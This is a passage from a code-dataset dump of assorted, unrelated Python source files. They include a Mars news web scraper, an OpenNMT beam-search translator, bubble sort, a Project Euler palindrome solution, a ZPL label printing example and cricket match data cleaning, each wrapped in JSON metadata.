original)\n # cv2.imshow('Modified', modified)\n # cv2.waitKey(0)\n # cv2.destroyAllWindows()\n return modified\n\n\n# Convert a video sequence into frames\ndef vid_to_frame(vid_name, format='png'):\n vid_path = \"test\\\\additional\\\\{}\".format(vid_name)\n save_path = 'test\\\\additional\\\\{}'.format(vid_name.rstrip('.mp4'))\n automkdir(save_path)\n vid_capture = cv2.VideoCapture(vid_path)\n success, image = vid_capture.read()\n count = 0\n while success:\n # cur_frame = \"frame%d.png\" % count\n cv2.imwrite(save_path + \"\\\\frame%d.png\" % count, image)\n success, image = vid_capture.read()\n print(\"Read frame {} {}\".format(count, success))\n count += 1\n","sub_path":"utilities/pre_processing.py","file_name":"pre_processing.py","file_ext":"py","file_size_in_byte":3124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"76823873","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Apr 13 10:22:02 2019\n\n@author: zeyuyan\n\"\"\"\n\n# Dependencies\nfrom splinter import Browser\nimport pandas as pd\n\n\n# Initialize the browser\ndef init_browser():\n executable_path = {'executable_path': '/usr/local/bin/chromedriver'}\n return Browser('chrome', **executable_path, headless=False)\n\n# Scrape information\ndef scrape_info():\n final_dict = dict()\n \n browser = init_browser()\n \n \n \"\"\"\n Crawl news website\n \"\"\"\n news_web_url = \"https://mars.nasa.gov/news\"\n \n browser.visit(news_web_url)\n \n news_title = browser.find_by_css('.content_title > a')[0].text\n news_p = browser.find_by_css('.article_teaser_body')[0].text\n \n print(news_title)\n print(news_p)\n print(\"=\" * 20)\n \n final_dict[\"news_title\"] = news_title\n final_dict[\"news_p\"] = news_p\n \n \n \"\"\"\n Crawl image website\n \"\"\"\n images_web_url = \"https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars\"\n \n browser.visit(images_web_url)\n \n # Click on the first image\n browser.find_by_css(\".image_and_description_container\")[0].click()\n \n featured_image_url = browser.find_by_css(\".fancybox-image\")[0][\"src\"]\n \n print(featured_image_url)\n print(\"=\" * 20)\n \n final_dict[\"featured_image_url\"] = featured_image_url\n \n \n \"\"\"\n Crawl Mars weather\n \"\"\"\n weather_web_url = \"https://twitter.com/marswxreport?lang=en\"\n \n browser.visit(weather_web_url)\n \n sections = browser.find_by_css(\"p.TweetTextSize.TweetTextSize--normal.js-tweet-text.tweet-text\")\n \n for section in sections:\n if section.text.startswith(\"InSight\"):\n text_to_use = section.text\n break\n \n # Remove \\n\n text_to_use = text_to_use.replace(\"\\n\", \" \")\n \n # Further clean\n text_to_use = text_to_use.replace(\"InSight \", \"\")\n text_to_use = text_to_use.replace(\"sol\", \"Sol\")\n text_to_use = text_to_use.replace(\")\", \"),\")\n \n mars_weather = text_to_use\n \n print(mars_weather)\n print(\"=\" * 20)\n \n final_dict[\"mars_weather\"] = mars_weather\n \n \n \"\"\"\n Crawl Mars facts\n \"\"\"\n facts_web_url = \"https://space-facts.com/mars/\"\n \n tables = pd.read_html(facts_web_url)\n \n df = tables[0]\n \n df.columns = [\"description\", \"value\"]\n df = df.set_index(\"description\")\n \n print(df)\n print(\"=\" * 20)\n \n df.to_html('table.html')\n \n \n \"\"\"\n Crawl Mars hemispheres\n \"\"\"\n hemispheres_web_url = \"https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars\"\n \n browser.visit(hemispheres_web_url)\n \n elements = browser.find_by_css(\"img.thumb\")\n \n hemisphere_image_urls = []\n \n for i in range(len(elements)):\n store_dict = dict()\n browser.find_by_css(\"img.thumb\")[i].click()\n title = browser.find_by_css(\"div.content h2.title\").text\n title = title.replace(\" Enhanced\", \"\")\n img_url = browser.find_by_css(\"div.downloads li a\")[0][\"href\"]\n store_dict[\"title\"] = title\n store_dict[\"img_url\"] = img_url\n hemisphere_image_urls.append(store_dict)\n browser.back()\n \n print(hemisphere_image_urls)\n print(\"=\" * 20)\n \n final_dict[\"hemisphere_image_urls\"] = hemisphere_image_urls\n \n # Close the browser after scraping\n browser.quit()\n \n return final_dict\n ","sub_path":"Coursework 10 - Web Scraping and Mongo Homework/scrape_mars.py","file_name":"scrape_mars.py","file_ext":"py","file_size_in_byte":3431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"421346387","text":"# coding: utf8\n\nfrom rust.core import business\n\nfrom db.message import models as message_models\n\n\nclass ReadService(business.Service):\n\t\"\"\"\n\t阅读服务\n\t\"\"\"\n\tdef read(self, messages):\n\t\t\"\"\"\n\t\t阅读\n\t\t\"\"\"\n\t\tmessage_ids = []\n\t\tfor message in messages:\n\t\t\tmessage_ids.append(message.id)\n\n\t\tmessage_models.Message.update(\n\t\t\ttag = message_models.TAG['OLD']\n\t\t).dj_where(id__in=message_ids).execute()\n","sub_path":"business/message/read_service.py","file_name":"read_service.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"280175707","text":"import onmt\nimport onmt.modules\nimport torch.nn as nn\nimport torch\nfrom torch.autograd import Variable\n\n\n# A class for translating during validation\n# Not for effectively loading model and translate\nclass InplaceTranslator(object):\n \n def __init__(self, model, dicts, beam_size=1, cuda=True):\n \n self.model = model\n self.dicts = dicts\n self.beam_size = beam_size\n self.cuda = cuda\n self.n_best = beam_size\n \n self.max_sent_length = 100\n \n self.tt = torch.cuda if self.cuda else torch\n \n \n def switchPair(sid, setIDs):\n self.model.switchLangID(setIDs[sid][0], setIDs[sid][1])\n self.model.switchPairID(sid)\n\n\n def _getBatchSize(self, batch):\n \n return batch.size(1)\n \n def translateBatch(self, srcBatch):\n # Batch size is in different location depending on data.\n beamSize = self.beam_size\n\n # (1) run the encoders on the src\n \n states, context = self.model.encoder(srcBatch)\n\n # reshape the states\n encStates = (self.model._fix_enc_hidden(states[0]),\n self.model._fix_enc_hidden(states[1]))\n\n # Drop the lengths needed for encoder.\n srcBatch = srcBatch[0]\n batchSize = self._getBatchSize(srcBatch)\n\n rnnSize = context.size(2)\n \n #~ decoder = self.model.decoder\n #~ attentionLayer = decoder.attn.current()\n useMasking = ( batchSize > 1 )\n\n # This mask is applied to the attention model inside the decoder\n # so that the attention ignores source padding\n padMask = None\n if useMasking:\n padMask = srcBatch.data.eq(onmt.Constants.PAD).t()\n\n def mask(padMask):\n if useMasking:\n #~ attentionLayer.applyMask(padMask)\n self.model.decoder.attn.current().applyMask(padMask)\n\n # (2) run the decoder to generate sentences, using beam search\n\n # Expand tensors for each beam.\n \n context = Variable(context.data.repeat(1, beamSize, 1))\n \n decStates = (Variable(encStates[0].data.repeat(1, beamSize, 1)),\n Variable(encStates[1].data.repeat(1, beamSize, 1)))\n \n\n \n # Initialize the beams\n # Each beam is an object containing the translation status for each sentence in the batch\n beam = [onmt.Beam(beamSize, self.cuda) for k in range(batchSize)]\n \n # Here we prepare the decoder output (zeroes)\n # For input feeding\n decOuts = self.model.make_init_decoder_output(context)\n \n\n if useMasking:\n padMask = srcBatch.data.eq(\n onmt.Constants.PAD).t() \\\n .unsqueeze(0) \\\n .repeat(beamSize, 1, 1)\n\n batchIdx = list(range(batchSize))\n remainingSents = batchSize\n for i in range(self.max_sent_length):\n mask(padMask)\n # Prepare decoder input.\n input = torch.stack([b.getCurrentState() for b in beam\n if not b.done]).t().contiguous().view(1, -1)\n #~ \n #~ print(context.size())\n #~ \n #~ print(decOuts.size())\n \n # compute new decoder output (distribution)\n decOuts, decStates, attn = self.model.decoder(\n Variable(input, volatile=True), decStates, context, decOuts)\n \n # decOut: 1 x (beam*batch) x numWords\n decOuts = decOuts.squeeze(0) \n out = self.model.generator.forward(decOuts)\n \n \n\n # batch x beam x numWords\n wordLk = out.view(beamSize, remainingSents, -1) \\\n .transpose(0, 1).contiguous()\n attn = attn.view(beamSize, remainingSents, -1) \\\n .transpose(0, 1).contiguous()\n\n active = []\n for b in range(batchSize):\n if beam[b].done:\n continue\n\n idx = batchIdx[b]\n if not beam[b].advance(wordLk.data[idx], attn.data[idx]):\n active += [b]\n \n for decState in decStates: # iterate over h, c\n # layers x beam*sent x dim\n sentStates = decState.view(-1, beamSize,\n remainingSents,\n decState.size(2))[:, :, idx]\n sentStates.data.copy_(\n sentStates.data.index_select(\n 1, beam[b].getCurrentOrigin()))\n\n if not active:\n break\n\n # in this section, the sentences that are still active are\n # compacted so that the decoder is not run on completed sentences\n activeIdx = self.tt.LongTensor([batchIdx[k] for k in active])\n batchIdx = {beam: idx for idx, beam in enumerate(active)}\n\n def updateActive(t, size):\n # select only the remaining active sentences\n view = t.data.view(-1, remainingSents, size)\n newSize = list(t.size())\n newSize[-2] = newSize[-2] * len(activeIdx) // remainingSents\n return Variable(view.index_select(1, activeIdx)\n .view(*newSize), volatile=True)\n \n decStates = (updateActive(decStates[0], rnnSize),\n updateActive(decStates[1], rnnSize))\n decOuts = updateActive(decOuts, rnnSize)\n context = updateActive(context, rnnSize)\n if useMasking:\n padMask = padMask.index_select(1, activeIdx)\n\n remainingSents = len(active)\n\n # (4) package everything up\n allHyp, allScores, allAttn = [], [], []\n n_best = self.n_best\n\n for b in range(batchSize):\n scores, ks = beam[b].sortBest()\n\n allScores += [scores[:n_best]]\n hyps, attn = zip(*[beam[b].getHyp(k) for k in ks[:n_best]])\n allHyp += [hyps]\n if useMasking:\n valid_attn = srcBatch.data[:, b].ne(onmt.Constants.PAD) \\\n .nonzero().squeeze(1)\n attn = [a.index_select(1, valid_attn) for a in attn]\n allAttn += [attn]\n \n if useMasking:\n self.model.decoder.attn.current().applyMask(None)\n\n return allHyp, allScores, allAttn\n\n def translate(self, srcBatch):\n # (1) convert words to indexes\n src = srcBatch\n batchSize = self._getBatchSize(src[0])\n\n # (2) translate\n pred, predScore, attn = self.translateBatch(src)\n\n # (3) convert indexes to words\n predBatch = []\n for b in range(batchSize):\n # only take the top of the beam search - for simplicity\n predBatch.append(pred[b][0])\n\n return predBatch\n","sub_path":"onmt/InplaceTranslator.py","file_name":"InplaceTranslator.py","file_ext":"py","file_size_in_byte":7108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"245812115","text":"\"\"\"\n library.py\n Nicholas S. Bradford\n April 2016\n\n Contains relevant markers for song sections.\n\n\"\"\"\n\nfrom songs import Song, SongComparison\n\n#==================================================================================================\n# Songs\n\n#================================================\nmonster_verses = [\n (0, 14)\n]\nmonster_chorus = [\n (44, 65)\n]\n\n#================================================\ncomplete_monster_verse = [\n (14, 44),\n (65, 89)\n]\ncomplete_monster_chorus = [\n (44, 65),\n (89, 117),\n (138, 173)\n]\n\n#================================================\nhowyouloveme_verses = [\n (8, 38)\n]\nhowyouloveme_chorus = [\n (68, 97)\n]\n\n#================================================\nfeelgood_verses = [\n #(12, 39)\n #(39, 71)\n (39, 52)\n]\nfeelgood_chorus = [\n (71, 84)\n #(71, 100)\n]\n\n#================================================\n# maledictus\nconfutatis_chorus = [\n (1, 17),\n (36, 52)\n # (0, 18),\n # (35, 54)\n]\n# boca me\nconfutatis_verses = [\n (19, 33),\n (55, 89)\n # (18, 34),\n # (54, 90)\n]\n# boca me extra\nconfutatis_bridge = [\n (90, 160)\n]\n\n#================================================\n# soft verse\none_verses = [\n (19, 105),\n (105, 134)\n]\n# metal bridge\none_chorus = [\n #(278, 320)# 4:33 - 5:20,\n (320, 443) #5:20-5:46, 7:23 guitar solo\n]\n\n#================================================\n\nchampions_verses = [\n (1, 24), #23?\n (76, 100) # 110?\n]\nchampions_chorus = [\n (34, 66),\n (110, 174)\n]\n\n#================================================\nremember_verses = [\n (34, 100)\n]\nremember_chorus = [\n (22, 33),\n (101, 111),\n (180, 191)\n]\n\n\n\n#================================================\nentire_confutatis = [(0, 90)]\nentire_monster = [(0, 173)]\n\n\n\n#Here starts TSB's music.\n#================================================\nshame_verses = [\n (4, 17),\n (50,67)\n]\nshame_chorus = [\n (33, 49),\n (83, 99)\n]\n#================================================\nday_verses = [\n (2, 47),\n (64,95)\n]\nday_chorus = [\n (48,63 ),\n (96,110 )\n]\n\n#================================================\nfathertime_verses = [\n (2,40 ),\n (59,87)\n]\nfathertime_chorus = [\n (41, 58),\n (143,180)\n]\n\n#================================================\nyou_verses = [\n (2,43 ),\n (61,93)\n]\nyou_chorus = [\n (44, 60),\n (94,110)\n]\n\n#================================================\nmercy_verses = [\n (2,96 ),\n (129,173)\n]\nmercy_chorus = [\n (97, 128),\n (228, 268)\n]\n\n#================================================\nconformity_verses = [\n (3 ,32),\n (58 ,82)\n]\nconformity_chorus = [\n (33 ,53 ),\n (128, 168)\n]\n\n#==================================================================================================\n# Complete Song data\n\n#TSB's music starts here.\nshame = Song(\"Shame\", 'input/01_Shame.wav',\n verses = shame_verses,\n chorus = shame_chorus)\nday = Song(\"Day\",'input/02_Day.wav',\n verses = day_verses,\n chorus = day_chorus)\nfathertime = Song(\"Father Time\",'input/04_FatherTime.wav',\n verses = fathertime_verses,\n chorus = fathertime_chorus)\nyou = Song(\"You\",'input/05_You.wav',\n verses = you_verses,\n chorus = you_chorus)\nmercy = Song(\"Mercy\",'input/06_Mercy.wav',\n verses = mercy_verses,\n chorus = mercy_chorus)\nconformity = Song(\"conformity\",'input/07_conformity.wav',\n verses = conformity_verses,\n chorus = conformity_chorus)\n\n#NSB's music starts here.\nmonster = Song('Monster', 'input/monster.wav',\n verses=monster_verses,\n chorus=monster_chorus)\nhowyouloveme = Song('How You Love Me', 'input/howyouloveme.wav',\n verses=howyouloveme_verses,\n chorus=howyouloveme_chorus)\nfeelgood = Song('Feel Good Inc.', 'input/feelgood.wav',\n verses=feelgood_verses,\n chorus=feelgood_chorus)\nconfutatis = Song('Confutatis Maledictis', 'input/confutatis.wav',\n verses=confutatis_verses,\n chorus=confutatis_chorus)\none = Song('One', 'input/one.wav',\n verses=one_verses,\n chorus=one_chorus)\nchampions = Song('We are the Champions', 'input/champions.wav',\n verses=champions_verses,\n chorus=champions_chorus)\nremember = Song('Remember the Name', 'input/remember.wav',\n verses=remember_verses,\n chorus=remember_chorus)\n\nrock_v_classical = SongComparison(\n name='Monster v Confutatis',\n verses=monster_verses,\n chorus=confutatis_chorus,\n filepath_verses='input/monster.wav',\n filepath_chorus='input/confutatis.wav')\n\npop_v_classical = SongComparison(\n name='HowYouLoveMe v Confutatis',\n verses=howyouloveme_verses,\n chorus=confutatis_chorus,\n filepath_verses='input/howyouloveme.wav',\n filepath_chorus='input/confutatis.wav')\n\npop_v_rock_choruses = SongComparison(\n name='HowYouLoveMe v Monster',\n verses=howyouloveme_chorus,\n chorus=monster_chorus,\n filepath_verses='input/howyouloveme.wav',\n filepath_chorus='input/monster.wav')\n\nrap_v_classical = SongComparison(\n name='RememberTheName v Confutatis',\n verses=remember_verses,\n chorus=confutatis_chorus,\n filepath_verses='input/remember.wav',\n filepath_chorus='input/confutatis.wav')\n\nentire_monster_v_confutatis = SongComparison(\n name='Entire Monster v Confutatis',\n verses=entire_monster,\n chorus=entire_confutatis,\n filepath_verses='input/monster.wav',\n filepath_chorus='input/confutatis.wav')\n","sub_path":"musicml/library.py","file_name":"library.py","file_ext":"py","file_size_in_byte":5370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"472589107","text":"#This is Bubble sort\r\n'''We would be given an array and we need to sort it\r\n This Algorithm has O(n^2) complexity'''\r\ndef BubbleSort(arr):\r\n n = len(arr)\r\n for i in range(n):\r\n for j in range(n-i-1): #Here we are trying to put the maximum to the last.\r\n if(arr[j]>arr[j+1]):\r\n arr[j],arr[j+1]=arr[j+1],arr[j]\r\n return arr\r\ndef main():\r\n a = list(map(int,input().split()))\r\n print(BubbleSort(a))\r\nif(__name__=='__main__'):\r\n main()\r\n'''So, lets say our array is [4,3,1,5,2]\r\n We keep replacing the element if it is greater than the element on the right side\r\n Eventually we will have\r\n 5 at index 4\r\n the 4 at index 3 and so on.'''\r\n","sub_path":"Sorting Techniques/Bubble Sort.py","file_name":"Bubble Sort.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"102810486","text":"tribe_prompt = True\nwhile tribe_prompt == True:\n tribe = int(input(\"Choose a tribe:\\nSelect 1 for Teutons\\nSelect 2 for Gauls\\nSelect 3 for Romans\\n\"))\n if tribe == 1:\n print(\"Welcome Teuton!\")\n break\n elif tribe == 2:\n print(\"Welcome Gaul!\")\n break\n elif tribe == 3:\n print(\"Welcome Roman!\")\n break\n else:\n print(\"Invalid option.\")\n","sub_path":"vimgame.py","file_name":"vimgame.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"513462074","text":"zdrojovyDokument = open(\"Answers.csv\")\nacc = 0\nv = 0\nprvniRadek = True\njmenoNejstarsiho = \"\"\n\nfor radek in zdrojovyDokument:\n if prvniRadek:\n prvniRadek = False\n continue\n jedenFormular = radek.strip(\"\\n\").split(\",\")\n if jedenFormular[2] == \"Yes\":\n acc = acc + 1 + int(jedenFormular[4])\n if int(jedenFormular[3]) > v:\n v = int(jedenFormular[3])\n jmenoNejstarsiho = jedenFormular[1]\n\n\nprint(acc)\nprint(v)\nprint(jmenoNejstarsiho)\n\nzdrojovyDokument.close()\n# parsujeme dokument","sub_path":"Dotaznik.py","file_name":"Dotaznik.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"269462326","text":"from ..open_mysql import OpenMySQL\nimport json\nimport datetime\nimport uuid\n\n\ndef make_l_b_competition_package():\n db = OpenMySQL(db='leisu')\n # ID_DICT = db.select_leisu()\n result = []\n # result = db.select_l_b(table='competition_b')\n DATAS = db.select_b_leisu()\n player_rank = db.select_l_b(table='player_rank')\n team_rank = db.select_l_b(table='team_rank')\n package_list = []\n for competition in result:\n Packages = {}\n CompareHeader = {'SourceItem': 2, 'ColectType': 1, 'PackageType': 0, 'OtherID': '',\n 'OtherName': competition.get('competition_name'), 'CollecSign': False,\n 'CurrentSeason': competition.get('CurrentSeason'), 'OtherSeasonID': competition.get('season_id'),\n }\n ew_rank = json.loads(competition.get('ew_rank'), encoding='utf-8') if competition.get('ew_rank') and competition.get('ew_rank') != 'None' else None\n zone_rank = json.loads(competition.get('zone_rank'), encoding='utf-8') if competition.get('zone_rank') and competition.get('zone_rank') != 'None' else None\n if ew_rank:\n if zone_rank:\n ew_rank += zone_rank\n if competition.get('competition_name') == 'CBA':\n standings = list(map(lambda x: {'title_name': x.get('title_name'), 'scope': x.get('scope'), 'Standing':\n [[rank.get('rank'), rank.get('team_id'), rank.get('team_name'),\n str(int(rank.get('win')) + int(rank.get('los'))), rank.get('win'),\n rank.get('los'), rank.get('win_pro'), rank.get('pre'), rank.get('pre_type'),\n str(abs(float(rank.get('pre')) - float(rank.get('pre_type')))),\n rank.get('win_sub_los').split('-')[0], rank.get('win_sub_los').split('-')[-1],\n rank.get('home').split('-')[0], rank.get('home').split('-')[-1],\n rank.get('score')] for rank in x.get('datas')]}, ew_rank))\n else:\n standings = list(map(lambda x: {'title_name': x.get('title_name'), 'scope': x.get('scope'), 'Standing':\n [[rank.get('rank'), rank.get('team_id'), rank.get('team_name'),\n rank.get('win'), rank.get('los'), rank.get('win_pro'),\n rank.get('win_sub_los'), rank.get('pre_type') .split('-')[0],\n rank.get('pre_type').split('-')[-1],\n rank.get('pre').split('-')[0], rank.get('pre').split('-')[-1],\n rank.get('home').split('-')[0], rank.get('home').split('-')[-1],\n rank.get('away').split('-')[0], rank.get('away').split('-')[-1],\n rank.get('ten').split('-')[0], rank.get('ten').split('-')[-1],\n rank.get('score'), rank.get('points'), str(abs(float(rank.get('score')) - float(rank.get('points')))),\n rank.get('winning_streak')] for rank in x.get('datas')]}, ew_rank))\n # test = json.dumps(standings, ensure_ascii=False)\n Packages['B_CompetitionStanding'] = standings\n package_dumps = {'ID': str(uuid.uuid1()),\n 'CollectTime': datetime.datetime.now().strftime('%Y-%m-%dT%H:%M:%S'),\n 'CompareHeader': CompareHeader, 'Packages': Packages, }\n package_list.append(package_dumps)\n for competition in [{'competition_id': 1, 'competition_name': 'NBA'}, {'competition_id': 3, 'competition_name': 'CBA'}]:\n Packages = {}\n CompareHeader = {'SourceItem': 2, 'ColectType': 1, 'PackageType': 0,\n 'OtherID': competition.get('competition_id'), 'OtherName': competition.get('competition_name'),\n 'CurrentSeason': '2018', 'OtherSeasonID': '2018-2019',\n 'CollecSign': False,\n # 'OtherShortName': country.get('Name') if country else None,\n }\n def dumps_func(x):\n competition_type = {3: 1, 4: 3}\n if x.get('season_id') == 2018 and x.get('competition_name') == competition.get('competition_name'):\n for player in DATAS[3]:\n if competition_type.get(player.get('competition_id')) == competition.get('competition_id'):\n x_name = x.get('player_name').replace('-', '_').replace('·', '_')\n player_name = player.get('player_name').replace('-', '_')\n if x_name in player_name or player_name in x_name:\n # if player.get('team_name') in x.get('team_name') or x.get('team_name') in player.get('team_name'):\n datas = {'PlayerID': {'SourceItem': 1, 'ColectType': 1, 'PackageType': 3,\n 'OtherID': player.get('player_id'), 'OtherName': x.get('player_name'), 'CollecSign': False, },\n 'ScoreAvg': float(x.get('ScoreAvg')) if x.get('ScoreAvg') else None,\n 'BoardsAvg': float(x.get('BoardsAvg')) if x.get('BoardsAvg') else None,\n 'AssistsAvg': float(x.get('AssistsAvg')) if x.get('AssistsAvg') else None,\n 'BlocksAvg': float(x.get('BlocksAvg')) if x.get('BlocksAvg') else None,\n 'StealsAvg': float(x.get('StealsAvg')) if x.get('StealsAvg') else None, }\n return datas\n # else:\n # print(x.get('player_name'), x.get('team_name'))\n # # print(player.get('player_name'), player.get('team_name'))\n # print()\n player = list(filter(lambda f: f, map(lambda x: dumps_func(x), player_rank)))\n team = list(filter(lambda f: f, map(lambda x: {'TeamId': {'SourceItem': 2, 'ColectType': 1, 'PackageType': 2,\n 'OtherID': DATAS[2].get(x.get('team_name')), 'OtherName': x.get('team_name'),\n 'CollecSign': False, },\n 'ScoreAvg': float(x.get('ScoreAvg')) if x.get('ScoreAvg') else None,\n 'BoardsAvg': float(x.get('BoardsAvg')) if x.get('BoardsAvg') else None,\n 'AssistsAvg': float(x.get('AssistsAvg')) if x.get('AssistsAvg') else None,\n 'BlocksAvg': float(x.get('BlocksAvg')) if x.get('BlocksAvg') else None,\n 'StealsAvg':float(x.get('StealsAvg')) if x.get('StealsAvg') else None,\n 'ShootRate': float(x.get('ShootRate').replace('%', '') if x.get('ShootRate').endswith('%') else x.get('ShootRate')) / 100 if x.get('ShootRate') else None,\n 'ThreeShootRate': float(x.get('ThreeShootRate').replace('%', '') if x.get('ThreeShootRate').endswith('%') else x.get('ThreeShootRate')) / 100 if x.get('ThreeShootRate') else None,\n 'FreeThrowsRate': float(x.get('FreeThrowsRate').replace('%', '') if x.get('FreeThrowsRate').endswith('%') else x.get('FreeThrowsRate')) / 100 if x.get('FreeThrowsRate') else None}\n if x.get('season_id') == 2018 and x.get('competition_name') == competition.get('competition_name') else None, team_rank)))\n B_CompetitionYeamPlayerSkill = {'team': team, 'player': player}\n Packages['B_CompetitionYeamPlayerSkill'] = B_CompetitionYeamPlayerSkill\n package_dumps = {'ID': str(uuid.uuid1()),\n 'CollectTime': datetime.datetime.now().strftime('%Y-%m-%dT%H:%M:%S'),\n 'CompareHeader': CompareHeader, 'Packages': Packages, }\n package_list.append(package_dumps)\n return package_list","sub_path":"scrapy_7m/tool/make_package_tool/l_b_make_package.py","file_name":"l_b_make_package.py","file_ext":"py","file_size_in_byte":7875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"3371205","text":"import re\n\ndef sentence_segmentation(line):\n seg_list = []\n# for line in text :\n# seg_list = []\n sentence = re.findall(r'([A-Z].*?[\\.;:\\?]\\s)', line)\n if sentence:\n seg_list = sentence\n #print(sentence)\n return seg_list\n \nif __name__ == '__main__':\n with open('nlp.txt') as text:\n for line in text:\n sentence_list = sentence_segmentation(line)\n if sentence_list:\n for sentence in sentence_list:\n print(sentence, end = '\\n')\n\n\n\n","sub_path":"arai/chapter06/knock50.py","file_name":"knock50.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"645606706","text":"#!/usr/bin/env python3\n\"\"\"\n# Project Euler Problem 4\n## Largest Palindrome Product\n\nA palindromic number reads the same both ways. The largest palindrome made from\nthe product of two 2-digit numbers is 9009 = 91 99.\n\nFind the largest palindrome made from the product of two 3-digit numbers.\n\"\"\"\n\nfrom itertools import combinations, starmap\nimport operator\n\ndef rev(s):\n \"\"\"\n Reverse a string.\n \"\"\"\n # Leaving start and end blank and setting step to -1 in slice notation\n # reverses a string\n return s[::-1]\n\ndef is_palindromic(n):\n \"\"\"\n Checks whether an integer is palindromic or not.\n \"\"\"\n if type(n) is not int:\n raise TypeError('n must be an integer')\n \n n_str = str(n)\n\n # 1 digit is always palindromic\n if len(n_str) == 1:\n return True\n\n str_len = len(n_str)\n if (str_len % 2) == 0:\n # Even length numbers are palindromic if the digits on the left half of the\n # number are the same as the right half digits reversed.\n split_idx = str_len // 2\n if n_str[:split_idx] == rev(n_str[split_idx:]):\n return True\n else:\n return False\n else:\n # The check for odd length numbers is almost the same except the middle\n # digit is ignored when creating the two halves.\n split_idx_l = str_len // 2\n split_idx_r = split_idx_l + 1\n if n_str[:split_idx_l] == rev(n_str[split_idx_r:]):\n return True\n else:\n return False\n\ndef main():\n products = starmap(operator.mul, combinations(range(100,1000), 2))\n palindromic_products = filter(is_palindromic, products)\n max_palindromic_product = max(palindromic_products)\n print('Largest palindromic product of two three digit integers is {0}'.format(max_palindromic_product))\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/p4.py","file_name":"p4.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"42185866","text":"from simple_zpl2 import ZPLDocument, QR_Barcode, NetworkPrinter\n\n\nzpl = ZPLDocument()\nprinter = NetworkPrinter('192.168.49.43') # CHANGE TO YOUR PRINTER IP\n\nzpl.add_comment('Create a QR Code')\nzpl.add_field_origin(20, 20)\nqr_data = 'This is data inside a QR code. This is a barcode often read by cell phones.'\nqr = QR_Barcode(qr_data, 2, 2, zpl._QR_ERROR_CORRECTION_STANDARD)\nzpl.add_barcode(qr)\n\nzpl.add_comment('Now some text')\nzpl.add_field_origin(200, 20)\nzpl.add_font('C', zpl._ORIENTATION_NORMAL, 15)\nzpl.add_field_data('Text on Label')\n\n# Print generated text\nprinter.print_zpl(zpl)\n","sub_path":"examples/printing.py","file_name":"printing.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"101212021","text":"# %%\r\nimport pandas\r\nimport re\r\nimport os\r\nfrom datetime import datetime\r\n\r\n# %%\r\ndf = pandas.read_csv('files/matches.txt', '|')\r\ndg = pandas.read_csv('files/grounds.txt', '|')\r\ndr = pandas.read_csv('files/ICC_ODI.csv', ',')\r\n\r\n# %%\r\ndf = df[df['RESULT'] != 'No result']\r\ndf = df[df['RESULT'] != 'Match abandoned']\r\ndf = df[df['RESULT'] != 'Match cancelled']\r\ndf = df[~(df['RESULT'].str.contains('conceded'))]\r\ndf = df[~(df['RESULT'].str.endswith('won by default'))]\r\ndf = df[~(df['RESULT'].str.endswith('won by walkover'))]\r\n\r\n# %%\r\nddg = dict(tuple(dg.groupby(['GROUND'])))\r\n\r\n# %%\r\nfor row in dr.itertuples():\r\n dr.at[row.Index, 'Match_Date'] = datetime.strptime(row.Match_Date, '%d%b%Y').strftime('%Y-%m-%d')\r\n c1 = row.Team1\r\n c2 = row.Team2\r\n if 'run' in str(row.Margin):\r\n dg.at[row.Index, 'Team1'] = row.Winner\r\n dg.at[row.Index, 'Team2'] = c1 if row.Winner == c2 else c2\r\n if 'wicket' in str(row.Margin):\r\n dg.at[row.Index, 'Team2'] = row.Winner\r\n dg.at[row.Index, 'Team1'] = c1 if row.Winner == c2 else c2\r\n\r\n# %%\r\ndr = dr.reindex(columns = ['Match_Date', 'Team1', 'Team2', 'Ground', 'Team1_rank', 'Team2_rank'])\r\n\r\nddr = dict(tuple(dr.groupby(['Match_Date', 'Team1', 'Team2'])))\r\n\r\n# %%\r\ncompiled = re.compile(r'(.*)/(.*)/(.*)')\r\n\r\nfor row in df.itertuples():\r\n df.at[row.Index, 'DATE'] = compiled.sub(r'\\3-\\2-\\1', row.DATE)\r\n \r\n countries = row.COUNTRIES.split('v.')\r\n c1 = countries[0].strip()\r\n c2 = countries[1].strip()\r\n \r\n if row.RESULT == 'Match Tied':\r\n winner = None\r\n margin = 'Tied'\r\n else:\r\n results = row.RESULT.split(' won by ')\r\n winner = results[0].strip()\r\n margin = results[1].strip()\r\n df.at[row.Index, 'WINNER'] = winner\r\n df.at[row.Index, 'MARGIN'] = margin\r\n if 'run' in margin or 'urns' in margin or '114' in margin:\r\n df.at[row.Index, 'TEAM.1'] = winner\r\n df.at[row.Index, 'TEAM.2'] = c1 if winner == c2 else c2\r\n elif 'wicket' in margin or 'wiciket' in margin:\r\n df.at[row.Index, 'TEAM.2'] = winner\r\n df.at[row.Index, 'TEAM.1'] = c1 if winner == c2 else c2\r\n else:\r\n print('error margin ', margin)\r\n df.at[row.Index, 'TEAM.1'] = c1\r\n df.at[row.Index, 'TEAM.2'] = c2\r\n \r\n df.at[row.Index, 'CITY'] 